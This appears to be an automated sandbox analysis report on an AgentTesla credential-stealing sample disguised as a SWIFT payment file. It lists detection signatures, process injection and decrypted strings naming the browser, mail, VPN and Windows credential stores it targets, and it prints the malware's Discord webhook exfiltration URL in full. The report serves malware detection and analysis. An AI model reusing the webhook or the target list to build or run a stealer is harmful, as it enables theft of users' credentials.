Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SWIFT05062023.exe

Overview

General Information

Sample Name:SWIFT05062023.exe
Analysis ID:882717
MD5:b7475f585b317b4cdb0f385f147e635d
SHA1:c88c9416ffc3d97ac9ed1aeed6558c6f1b610207
SHA256:46887ad939b1f8d5e6588548aef4ebcbb3e924df26efc74ee5ddcdad4a23ed20
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Contains functionality to detect virtual machines (SLDT)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

  • System is w10x64
  • SWIFT05062023.exe (PID: 5660 cmdline: C:\Users\user\Desktop\SWIFT05062023.exe MD5: B7475F585B317B4CDB0F385F147E635D)
    • CasPol.exe (PID: 6952 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
  • cleanup
{"Exfil Mode": "Discord", "Discord url": "https://discord.com/api/webhooks/1114977540709289984/k4SQohEZgHj3IRvaJBioKCVlTv-1sy0NPHEWl2GHdoz5JLvX6trIkig77Yg2Nm1avTr9"}
SourceRuleDescriptionAuthorStrings
00000001.00000002.799972283.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
    00000001.00000002.800774951.0000000003641000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000001.00000002.800774951.0000000003641000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.540511718.0000016F11ADA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          Process Memory Space: CasPol.exe PID: 6952JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            0.2.SWIFT05062023.exe.16f11dafe48.1.unpackMSIL_SUSP_OBFUSC_XorStringsNetDetects XorStringsNET string encryption, and other obfuscators derived from itdr4k0nia
            • 0x18934:$pattern: 06 1E 58 07 8E 69 FE 17
            • 0x27a52:$a2: _CorExeMain
            • 0x238d6:$a3: mscorlib
            • 0x24c59:$a4: .cctor
            • 0x23656:$a6: <Module>
            0.2.SWIFT05062023.exe.16f11dafe48.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              1.2.CasPol.exe.400000.0.unpackMSIL_SUSP_OBFUSC_XorStringsNetDetects XorStringsNET string encryption, and other obfuscators derived from itdr4k0nia
              • 0x1a734:$pattern: 06 1E 58 07 8E 69 FE 17
              • 0x29852:$a2: _CorExeMain
              • 0x256d6:$a3: mscorlib
              • 0x26a59:$a4: .cctor
              • 0x25456:$a6: <Module>
              1.2.CasPol.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.SWIFT05062023.exe.16f11dafe48.1.raw.unpackMSIL_SUSP_OBFUSC_XorStringsNetDetects XorStringsNET string encryption, and other obfuscators derived from itdr4k0nia
                • 0x1a734:$pattern: 06 1E 58 07 8E 69 FE 17
                • 0x4476c:$pattern: 06 1E 58 07 8E 69 FE 17
                • 0x29852:$a2: _CorExeMain
                • 0x5388a:$a2: _CorExeMain
                • 0x256d6:$a3: mscorlib
                • 0x4f70e:$a3: mscorlib
                • 0x26a59:$a4: .cctor
                • 0x50a91:$a4: .cctor
                • 0x25456:$a6: <Module>
                • 0x4f48e:$a6: <Module>
                Click to see the 1 entries
                No Sigma rule has matched
                Timestamp:192.168.2.4162.159.137.232496954432851779 06/06/23-17:26:57.544403
                SID:2851779
                Source Port:49695
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Discord", "Discord url": "https://discord.com/api/webhooks/1114977540709289984/k4SQohEZgHj3IRvaJBioKCVlTv-1sy0NPHEWl2GHdoz5JLvX6trIkig77Yg2Nm1avTr9"}
                Source: SWIFT05062023.exeVirustotal: Detection: 22%Perma Link
                Source: SWIFT05062023.exeJoe Sandbox ML: detected
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: /log.tmp
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: KL
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: text/html
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: KL
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: text/html
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <br>[
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ]<br>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <br>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: PW
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: text/html
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: CO
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: application/zip
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Time:
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <br>User Name:
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <br>Computer Name:
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <br>OSFullName:
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <br>CPU:
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <br>RAM:
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <br>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: IP Address:
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <br>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <hr>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: New
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: /
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: IP Address:
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: _
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: /
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: /
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: false
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: false
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: false
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: false
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: false
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: true
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: false
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 20
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 20
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 4
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: https://discord.com/api/webhooks/1114977540709289984/k4SQohEZgHj3IRvaJBioKCVlTv-1sy0NPHEWl2GHdoz5JLvX6trIkig77Yg2Nm1avTr9
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: false
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: false
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: appdata
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: PUEjh
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: PUEjh.exe
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: PUEjh
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Type
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: :
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: :
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <br>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <hr>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <br>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <b>[
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ]</b> (
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: )<br>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {BACK}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {ALT+TAB}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {ALT+F4}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {TAB}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {ESC}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {Win}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {CAPSLOCK}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {KEYUP}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {KEYDOWN}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {KEYLEFT}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {KEYRIGHT}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {DEL}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {END}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {HOME}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {Insert}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {NumLock}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {PageDown}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {PageUp}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {ENTER}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {F1}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {F2}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {F3}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {F4}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {F5}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {F6}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {F7}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {F8}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {F9}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {F10}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {F11}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {F12}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor:
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: control
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {CTRL}
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: &
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: &amp;
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: &lt;
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: >
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: &gt;
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: "
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: &quot;
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <br><hr>Copied Text: <br>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <hr>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: logins
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: IE/Edge
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Windows Secure Note
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Windows Web Password Credential
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Windows Credential Picker Protector
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Web Credentials
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Windows Credentials
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Windows Domain Certificate Credential
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Windows Domain Password Credential
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Windows Extended Credential
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SchemaId
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: pResourceElement
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: pIdentityElement
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: pPackageSid
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: pAuthenticatorElement
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: IE/Edge
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: UC Browser
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: UCBrowser\
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: *
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Login Data
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: journal
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: wow_logins
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Safari for Windows
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <array>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <dict>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <string>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: </string>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <string>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: </string>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <data>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: </data>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: -convert xml1 -s -o "
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \fixed_keychain.xml"
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: "
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: "
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Microsoft\Credentials\
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Microsoft\Credentials\
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Microsoft\Credentials\
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Microsoft\Credentials\
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Microsoft\Protect\
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: credential
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: QQ Browser
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Tencent\QQBrowser\User Data
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Default\EncryptedStorage
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Profile
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \EncryptedStorage
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: entries
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: category
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Password
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: str3
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: str2
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: blob0
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: password_value
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: IncrediMail
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: PopPassword
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SmtpPassword
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Software\IncrediMail\Identities\
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Accounts_New
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: PopPassword
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SmtpPassword
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SmtpServer
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: EmailAddress
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Eudora
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: current
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Settings
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SavePasswordText
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Settings
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ReturnAddress
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: -
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Falkon Browser
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \falkon\profiles\
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: profiles.ini
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: profiles.ini
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \browsedata.db
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: autofill
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ClawsMail
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Claws-mail
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \clawsrc
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \clawsrc
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: passkey0
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: master_passphrase_salt=(.+)
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \accountrc
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: smtp_server
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: address
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: account
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: [
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor:
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ]
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \passwordstorerc
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: {(.*),(.*)}(.*)
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Flock Browser
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: APPDATA
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Flock\Browser\
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: signons3.txt
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ---
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: .
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ---
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: DynDns
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ALLUSERSPROFILE
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Dyn\Updater\config.dyndns
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: username=
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: password=
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: https://account.dyn.com/
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: t6KzXhCh
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ALLUSERSPROFILE
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Dyn\Updater\daemon.cfg
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: global
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: accounts
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: account.
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: username
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: account.
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: password
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Psi/Psi+
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: name
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: jid
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: password
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: jid
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Psi/Psi+
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: APPDATA
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Psi\profiles
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: APPDATA
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Psi+\profiles
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \accounts.xml
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \accounts.xml
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: OpenVPN
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Software\OpenVPN-GUI\configs
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Software\OpenVPN-GUI\configs
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Software\OpenVPN-GUI\configs\
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: username
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: auth-data
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: entropy
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: USERPROFILE
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \OpenVPN\config\
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: remote
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: remote
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: NordVPN
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: NordVPN
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: NordVpn.exe*
